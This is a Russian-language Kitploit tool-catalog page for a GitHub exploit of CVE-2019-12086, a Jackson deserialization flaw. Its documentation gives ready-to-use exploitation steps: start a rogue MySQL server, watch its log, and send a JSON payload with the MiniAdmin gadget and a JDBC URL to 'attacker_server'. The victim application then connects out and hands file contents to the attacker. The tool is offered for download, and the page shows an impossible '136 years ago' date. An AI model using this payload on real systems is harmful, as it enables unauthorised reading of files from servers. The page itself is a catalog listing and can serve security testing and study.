Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-12086 — jackson десериализация | Kitploit
Инструменты/GitHubGitHub/al1ex/cve-2019-12086
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийБезопасность Баз Данных
GitHubal1ex/cve-2019-12086

CVE-2019-12086

jackson десериализация

Репозиторий
136 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Документация

CVE-2019-12086 jackson unserialize

Эксплуатация уязвимости

  1. Запустите вредоносный MySQL-сервер:

python rogue_mysql_server.py

  1. В той же директории просмотрите mysql.log:

tail -f mysql.log

  1. Отправьте следующий JSON в уязвимое приложение:

["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

После десериализации вредоносной строки JSON, Jackson подключается к вредоносному MySQL-серверу, и содержимое прочитанного файла записывается в mysql.log вредоносного сервера.

Скачать инструмент